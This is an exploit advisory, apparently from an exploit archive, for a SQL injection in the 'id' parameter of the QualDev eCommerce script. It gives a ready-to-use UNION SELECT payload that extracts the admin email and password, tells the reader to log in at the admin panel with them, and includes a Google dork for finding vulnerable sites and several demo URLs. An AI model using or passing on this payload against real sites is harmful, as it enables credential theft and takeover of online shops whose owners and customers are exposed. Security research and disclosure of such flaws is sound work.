ExploitFixes
QualDev eCommerce script SQL Injection Vulnerability 2010-12-16 10:15:43

====================================================
QualDev eCommerce script SQL injection vulnerability
====================================================


# Exploit Title: QualDev eCommerce script SQL injection vulnerability
# Vendor: http://www.qualdev.com
# Date: 15.12.2010
# Version: all version
# Category:: webapps
# Google dork: inurl:"index.php?file=allfile"
# Tested on: FreeBSD 7.1
# Author: ErrNick
# Site: XakNet.ru, forum.xaknet.ru
# Contact: errnick[at]xaknet[dot]ru
# Greatz 2 all memberz of XakNet team ( X1mk0~, Saint, baltazar, SHYLLER,
Kronus, mst && others)

# Intro:

- A parameter is not properly sanitised before being used in a SQL query.
- Input passed to "id" parameter is not properly
- sanitised before being used in a SQL query. This can be
- exploited to manipulate SQL queries by injecting
- arbitrary SQL code.

# Exploit:


index.php?file=allfile&id=-9999+union+select+1,2,3,concat_ws(0x3a,vemail,vpassword),5,6,7+from+admin

logining with admin email && password there
http://victim/adminpanel/

#Demo:

-
http://www.site.com/index.php?file=allfile&id=-40+union+select+1,2,3,concat_ws(0x3a,vemail,vpassword),5,6,7+from+admin
-
http://www.site.com/index.php?file=allfile&id=-9999+union+select+1,2,3,concat_ws(0x3a,vemail,vpassword),5,6,7+from+admin
-
http://www.site.com/index.php?file=allfile&id=-9999+union+select+1,2,3,concat_ws(0x3a,vemail,vpassword),5,6,7+from+admin


Vizit us at http://xaknet.ru